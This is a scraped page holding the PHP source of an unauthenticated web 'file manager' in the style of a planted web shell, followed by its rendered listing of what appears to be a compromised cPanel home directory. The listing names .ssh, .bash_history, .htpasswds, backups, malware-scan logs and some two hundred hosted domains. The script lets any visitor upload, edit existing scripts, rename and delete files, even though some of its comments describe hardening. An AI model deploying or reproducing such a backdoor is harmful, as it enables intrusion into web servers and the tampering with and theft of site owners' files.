PATH:
home
/
lab2454c
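<?php
/* =====================================================
   PHP FILE MANAGER
   - Anti 0 KB write
   - Edit / upload / delete / rename of regular files
   - No directory delete
   - Browsing confined to the start directory ($base)

   NOTE(review): this script performs no authentication.
   Every request that reaches it can edit, upload, rename
   and delete files under $base, including existing
   scripts. Serve it only behind access control enforced
   by the web server, and remove it when not in use.
   ===================================================== */

// Log problems instead of printing them: rendered warnings disclose
// absolute filesystem paths to whoever sent the request.
error_reporting(E_ALL);
ini_set('display_errors', '0');
ini_set('log_errors', '1');

if (!headers_sent()) {
    // The page consists of destructive one-click forms; refuse framing.
    header('X-Frame-Options: DENY');
    header('X-Content-Type-Options: nosniff');
}

/* ================= CSRF TOKEN ================= */
// Every state-changing form carries a per-session token. Without it, any
// page open in the operator's browser could submit delete/rename/save
// requests on their behalf.
if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}
if (empty($_SESSION['fm_csrf']) || !is_string($_SESSION['fm_csrf'])) {
    $_SESSION['fm_csrf'] = bin2hex(random_bytes(32));
}
$csrf = $_SESSION['fm_csrf'];
$isPost = ($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST';
$csrfOk = $isPost
    && isset($_POST['csrf'])
    && is_string($_POST['csrf'])
    && hash_equals($csrf, $_POST['csrf']);

/* ================= HELPERS ================= */

/** Escape a string for HTML text and quoted-attribute context. */
function fm_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * True when $path is $base itself or lies below it.
 * Both arguments must already be canonical (realpath output); the trailing
 * separator stops "/srv/app-old" from matching a base of "/srv/app".
 */
function fm_within(string $path, string $base): bool
{
    if ($path === $base) {
        return true;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    return strncmp($path, $prefix, strlen($prefix)) === 0;
}

/**
 * Decide whether $name may be created by upload or rename.
 * Rejects dotfiles (per-directory server configuration) and any name with a
 * server-executable extension in any dot-separated position, so "a.php.jpg"
 * is refused as well. This is a denylist; an allowlist matched to the
 * deployment is the stronger control.
 */
function fm_name_allowed(string $name): bool
{
    if ($name === '' || $name[0] === '.' || strpos($name, "\0") !== false) {
        return false;
    }
    $blocked = [
        'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'pht', 'phps',
        'phar', 'cgi', 'pl', 'py', 'sh', 'shtml', 'asp', 'aspx', 'jsp',
    ];
    $segments = explode('.', strtolower($name));
    array_shift($segments); // the part before the first dot is never an extension
    foreach ($segments as $segment) {
        if (in_array(trim($segment), $blocked, true)) {
            return false;
        }
    }

    return true;
}

/**
 * True for a regular file that is not a symbolic link. Links are refused so
 * that a link inside the managed tree cannot be used to read or replace a
 * file outside it.
 */
function fm_plain_file(string $path): bool
{
    return is_file($path) && !is_link($path);
}

/* ================= PATH ================= */
// The start directory is the boundary. The "p" parameter is honoured only
// when its canonical form stays inside it; previously any directory the PHP
// process could read was accepted.
$base = realpath(getcwd() ?: __DIR__) ?: __DIR__;
$cwd = $base;

if (isset($_GET['p']) && is_string($_GET['p'])) {
    $real = realpath($_GET['p']);
    if ($real !== false && is_dir($real) && fm_within($real, $base)) {
        $cwd = $real;
    }
}

/* ================= BREADCRUMB ================= */

/**
 * Render $dir as a chain of links, one per path component.
 * Links to ancestors above the start directory are still emitted; the "p"
 * handler ignores them and falls back to the start directory.
 */
function nav(string $dir): string
{
    $path = '';
    $links = [];
    foreach (explode(DIRECTORY_SEPARATOR, $dir) as $part) {
        if ($part === '') {
            continue;
        }
        $path .= DIRECTORY_SEPARATOR . $part;
        $links[] = '<a href="?p=' . urlencode($path) . '">' . fm_html($part) . '</a>';
    }

    return implode(' / ', $links);
}

$msg = '';
if ($isPost && !$csrfOk) {
    $msg = 'Request rejected: missing or invalid form token.';
}

/* ================= SAVE FILE (ANTI 0 KB) ================= */
if (
    $csrfOk
    && isset($_POST['save'], $_POST['file'], $_POST['content'])
    && is_string($_POST['file'])
    && is_string($_POST['content'])
) {
    $file = basename($_POST['file']);
    $target = $cwd . DIRECTORY_SEPARATOR . $file;

    if (fm_plain_file($target) && is_writable($target)) {
        // Write to a sibling temp file first and swap it in only after a
        // non-empty write, so a failed write never truncates the original.
        $tmp = $target . '.tmp_' . uniqid('', true);
        $bytes = file_put_contents($tmp, $_POST['content'], LOCK_EX);
        clearstatcache(true, $tmp);

        if ($bytes !== false && filesize($tmp) > 0 && rename($tmp, $target)) {
            $msg = 'File saved successfully.';
        } else {
            if (is_file($tmp)) {
                unlink($tmp);
            }
            $msg = 'Write failed. File NOT modified.';
        }
    } else {
        $msg = 'File not writable.';
    }
}

/* ================= UPLOAD ================= */
if (
    $csrfOk
    && isset($_FILES['upload']['name'])
    && is_string($_FILES['upload']['name'])
    && $_FILES['upload']['name'] !== ''
) {
    if ($_FILES['upload']['error'] === UPLOAD_ERR_OK) {
        $name = basename($_FILES['upload']['name']);
        $dest = $cwd . DIRECTORY_SEPARATOR . $name;

        // The client chooses the file name; refuse names the web server
        // would execute or treat as configuration.
        if (!fm_name_allowed($name)) {
            $msg = 'Upload rejected: file type not allowed.';
        } elseif (!file_exists($dest) && move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) {
            $msg = 'Upload successful.';
        } else {
            $msg = 'Upload failed or file exists.';
        }
    } else {
        $msg = 'Upload error.';
    }
}

/* ================= DELETE FILE ================= */
if ($csrfOk && isset($_POST['delete'], $_POST['file']) && is_string($_POST['file'])) {
    $file = basename($_POST['file']);
    $target = $cwd . DIRECTORY_SEPARATOR . $file;

    if (fm_plain_file($target) && is_writable($target) && unlink($target)) {
        $msg = 'File deleted successfully.';
    } else {
        $msg = 'File not deletable.';
    }
}

/* ================= RENAME FILE ================= */
if (
    $csrfOk
    && isset($_POST['rename'], $_POST['old'], $_POST['new'])
    && is_string($_POST['old'])
    && is_string($_POST['new'])
) {
    $old = basename($_POST['old']);
    $new = basename($_POST['new']);

    $oldPath = $cwd . DIRECTORY_SEPARATOR . $old;
    $newPath = $cwd . DIRECTORY_SEPARATOR . $new;

    if ($new === '') {
        $msg = 'New filename cannot be empty.';
    } elseif (!fm_name_allowed($new)) {
        // Same rule as upload; otherwise a harmless upload could be renamed
        // into an executable name afterwards.
        $msg = 'Rename rejected: file type not allowed.';
    } elseif (!is_file($oldPath)) {
        $msg = 'Source file not found.';
    } elseif (file_exists($newPath)) {
        $msg = 'Target filename already exists.';
    } elseif (rename($oldPath, $newPath)) {
        $msg = 'File renamed successfully.';
    } else {
        $msg = 'Rename failed.';
    }
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ</title>
<style>
body { background:#111;color:#eee;font-family:Arial;font-size:14px }
a { color:#6cf;text-decoration:none }
textarea,input { background:#222;color:#eee;border:1px solid #444 }
ul { list-style:none;padding-left:0 }
li { margin:6px 0 }
.msg { color:#9f9;margin:10px 0 }
.small { font-size:12px;color:#aaa }
</style>
</head>
<body>

<h3>PATH: <?= nav($cwd); ?></h3>

<?php if ($msg): ?>
<div class="msg"><?= fm_html($msg); ?></div>
<?php endif; ?>

<form method="post" enctype="multipart/form-data">
<input type="hidden" name="csrf" value="<?= fm_html($csrf) ?>">
<input type="file" name="upload">
<input type="submit" value="Upload">
</form>
<hr>

<?php
/* ================= EDIT MODE ================= */
if (isset($_GET['e']) && is_string($_GET['e'])) {
    $file = basename($_GET['e']);
    $path = $cwd . DIRECTORY_SEPARATOR . $file;

    if (fm_plain_file($path) && is_readable($path)) {
        $raw = file_get_contents($path);
        $content = fm_html($raw === false ? '' : $raw);
?>
<form method="post">
<input type="hidden" name="csrf" value="<?= fm_html($csrf) ?>">
<textarea name="content" rows="20" cols="100"><?= $content ?></textarea><br>
<input type="hidden" name="file" value="<?= fm_html($file) ?>">
<input type="submit" name="save" value="Save">
</form>
<hr>
<?php
    }
}

/* ================= FILE LIST ================= */
$h = opendir($cwd);
if ($h === false) {
    echo '<div class="msg">Directory not readable.</div>';
} else {
    echo '<ul>';
    while (($i = readdir($h)) !== false) {
        // Hide "." always, and ".." at the boundary where it leads nowhere.
        if ($i === '.' || ($i === '..' && $cwd === $base)) {
            continue;
        }

        $p = $cwd . DIRECTORY_SEPARATOR . $i;
        $label = fm_html($i);

        if (is_dir($p)) {
            echo '<li>[+] <a href="?p=' . urlencode($p) . '">' . $label . '</a></li>';
            continue;
        }

        // The confirm() text sits inside JavaScript inside an HTML attribute.
        // HTML-escaping alone is undone by the attribute parser, so a quote
        // in a file name would end the JS string; encode for JS first, then
        // for the attribute.
        $confirm = json_encode(
            'Delete file ' . $i . '?',
            JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
        );
        if ($confirm === false) {
            $confirm = '"Delete this file?"'; // name was not valid UTF-8
        }

        echo '<li>[-] ' . $label . '
        <a href="?e=' . urlencode($i) . '&amp;p=' . urlencode($cwd) . '">[edit]</a>

        <form method="post" style="display:inline">
            <input type="hidden" name="csrf" value="' . fm_html($csrf) . '">
            <input type="hidden" name="old" value="' . $label . '">
            <input type="text" name="new" placeholder="new name" size="12">
            <input type="submit" name="rename" value="rename">
        </form>

        <form method="post" style="display:inline"
              onsubmit="return confirm(' . fm_html($confirm) . ')">
            <input type="hidden" name="csrf" value="' . fm_html($csrf) . '">
            <input type="hidden" name="file" value="' . $label . '">
            <input type="submit" name="delete" value="delete">
        </form>
        </li>';
    }
    closedir($h);
    echo '</ul>';
}
?>

</body>
</html>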
[+]
..
[+]
.ssh
[+]
cotexprotocol.com
[+]
omvstudio.com
[+]
kyotounitnotes.com
[+]
vaxfi.com
[+]
var
[+]
crypthorize.org
[+]
am.elementalrock.com
[+]
caribbeanclimateneutralregistry.com
[+]
ercabarterholding.com
[+]
carbonbullion.com
[+]
.subaccounts
[+]
minit.com
[-] .pearrc
[edit]
[+]
kyc.datmont.com
[+]
keyreum.com
[+]
archswipe.com
[+]
imbtrust.com
[+]
igstin.org
[+]
omvplay.com
[-] .lastlogin
[edit]
[+]
.cphorde
[+]
perl5
[+]
divinesaintbasseterre.com
[+]
shop.elementalmill.com
[+]
sovereignshore.com
[+]
senetry.com
[+]
ifsin.com
[+]
public_html
[+]
shakcoin.com
[+]
.wp-cli
[+]
gemspotmarket.com
[+]
invest.equitablebarter.com
[+]
londston.com
[+]
worldcarboncapture.com
[+]
atopec.com
[+]
arcadiacircle.com
[+]
argowells.com
[+]
bin
[+]
php
[+]
nioch.com
[+]
lordritzy.com
[+]
etc
[+]
access-logs
[+]
crediteen.com
[+]
credityork.com
[+]
minersandcommoditytraders.com
[+]
igpma.com
[+]
caimexchange.com
[+]
cashewinc.com
[+]
cbcei.com
[-] .spamassassinenable
[edit]
[+]
veritserv.com
[+]
sportsnovate.com
[+]
shakalar.com
[+]
wyntle.com
[+]
www
[+]
onemediaverse.com
[-] .bash_profile
[edit]
[-] whsy.php
[edit]
[+]
amgholdingcompany.com
[+]
aficb.com
[+]
greencreditexchange.com
[+]
.trash
[+]
gemition.com
[+]
financial.datmont.com
[+]
dsbjewel.com
[+]
tripvare.com
[+]
mellogia.com
[+]
mactbank.com
[+]
kyotounitexchange.com
[+]
cvrmarkets.com
[+]
tmp
[+]
veritserv.net
[+]
westernclear.net
[+]
dsbjewels.com
[-] climatefinancebank.com.zip
[edit]
[+]
23rdbank.com
[+]
sparxnovate.com
[+]
mail
[+]
glamwit.com
[+]
elementalmill.com
[+]
otgosports.com
[+]
reelcode.com
[+]
biocei.com
[+]
mact34.com
[+]
internationalmetaversebank.com
[+]
cbmegroup.com
[+]
elementalrefinery.com
[+]
cashewpay.com
[+]
gemsaq.com
[+]
lmma.org
[+]
ercabartercapital.com
[+]
portude.com
[+]
argowellsproperties.com
[+]
.cpanel
[+]
gemstockmarket.com
[+]
costbloc.site
[+]
budget.veritserv.com
[+]
sow.veritserv.com
[+]
banksafeone.com
[+]
caimegroup.com
[+]
beleci.com
[+]
carbonbullion.net
[+]
highnetrock.com
[+]
chrisitanitybank.com
[+]
environmentalassetexchange.com
[+]
adenbic.com
[+]
fcxpro.com
[+]
.softaculous
[+]
keebchat.com
[+]
.spamassassin
[+]
climateassettrade.com
[+]
validatekey.com
[+]
isaaclondston.com
[+]
coshade.com
[+]
geniopix.com
[+]
cbfintrade.com
[+]
omvse.com
[+]
climatecontinental.com
[+]
assetmontree.com
[+]
sparxbank.com
[+]
sportstude.com
[-] malware_scan_07-11.txt
[edit]
[+]
oneclimatestandard.com
[+]
crypto.keyreum.com
[+]
kyotounitnote.com
[+]
.razor
[+]
bancmils.com
[+]
sothebankuab.com
[+]
nationalclimatechangeregistry.com
[+]
23rdb.com
[+]
credityorkgroup.com
[-] .bash_history
[edit]
[+]
carbonbullionmint.com
[+]
securepaychip.com
[+]
bullclimate.com
[+]
tripvares.com
[+]
incforce.com
[-] .contactemail
[edit]
[+]
africanforeignbank.com
[-] .wp-toolkit-identifier
[edit]
[+]
cbmindex.com
[+]
carbonterminal.com
[+]
nfsin.org
[+]
shaksettle.com
[-] .bash_logout
[edit]
[+]
.koality
[+]
gemcommodity.com
[+]
futurescarbonexchange.com
[+]
cfbinternational.com
[+]
ifsin.org
[+]
idenbic.com
[+]
intermetaversebank.com
[+]
datmont.com
[+]
.htpasswds
[+]
costbloc.com
[-] public_html.zip
[edit]
[+]
oneclimatestandards.com
[+]
christianitybank.org
[+]
elementalrock.com
[+]
internationalminersbank.com
[+]
sports.keyreum.com
[+]
icuamaps.com
[+]
payvory.com
[+]
omvstudioentertainment.com
[+]
icuamap.com
[+]
crypthorize.com
[+]
amghc.net
[+]
argowell.com
[+]
climatefinancebank.com
[+]
spaxtac.com
[+]
baas.elementalrock.com
[+]
gemiton.com
[+]
internationalcarbonregistry.com
[+]
netxzero.com
[+]
shakbase.com
[+]
shakalar.org
[+]
23rdpay.com
[+]
igsin.com
[+]
.pki
[+]
beleciano.com
[+]
sports.sparxnovate.com
[+]
logs
[-] .htaccess
[edit]
[+]
environmentalassetsexchange.com
[-] .spamassassinboxenable
[edit]
[-] .bashrc
[edit]
[+]
kyotounits.com
[+]
ssl
[+]
incforce.net
[+]
crypthorize.net
[+]
worldcarboncapture.org
[+]
hibiscard.com
[+]
foremostcard.com
[+]
dansact.com
[+]
keyreum.org
[+]
wordpress-backups
[+]
softkinesis.com
[-] malware_scan-19-11-23.txt
[edit]
[+]
costinbulk.com
[+]
bespoketrading.com
[+]
public_ftp
[+]
costbloc.net
[+]
tudeflix.com
[+]
invest.credityork.com
[+]
omvstudios.com
[+]
sparxbankgroup.com
[+]
aficbgroup.com
[+]
embaar.com
[+]
africanforeignfinancialcredit.com
[+]
23rdbanking.com
[+]
amgconsortium.com
[+]
scostrade.com
[+]
cashuw.com
[+]
igstin.com
[+]
equitablebarter.com
[+]
bullionmils.com
[+]
vaultchip.com
[+]
nfsin.com
[+]
foreclass.com
[+]
westernclear.com
[+]
keyreum.net
[+]
archfort.com
[+]
elementstal.com
[+]
inctechhub.com
[+]
erbarter.com
[+]
kyotounit.com
[+]
sothebry.softkinesis.com
[-] error_log
[edit]
[+]
equitablegold.com
[+]
vkeycloud.com
[+]
sparxnovate.net
[+]
christianitybank.com
[+]
carbonbullionmarketexchange.com
[+]
.composer
[+]
transferwit.elementalrock.com
[+]
firstdigitalbank.com
[+]
africanforeigninvestment.com
[+]
whtcd.com
[+]
bullionmills.com
[-] .viminfo
[edit]
[+]
africanforeigninvestmentcreditbenefits.com
[+]
carbonmarketsgroup.com
[+]
carbonbullionexchange.com
[+]
firstdigital.com
[+]
originalmediaverse.com
[+]
invest.westernclear.com
[+]
healthvalidate.com
[+]
hibiscash.com
[+]
isaacdaniel.com
[-] .myimunify_id
[edit]
[+]
isparxcloud.com
[+]
argowellgroup.com
[-] .imunify_patch_id
[edit]
[+]
gce.elementalrock.com
[+]
costbloc.org
[+]
africanforeigncreditbenefits.com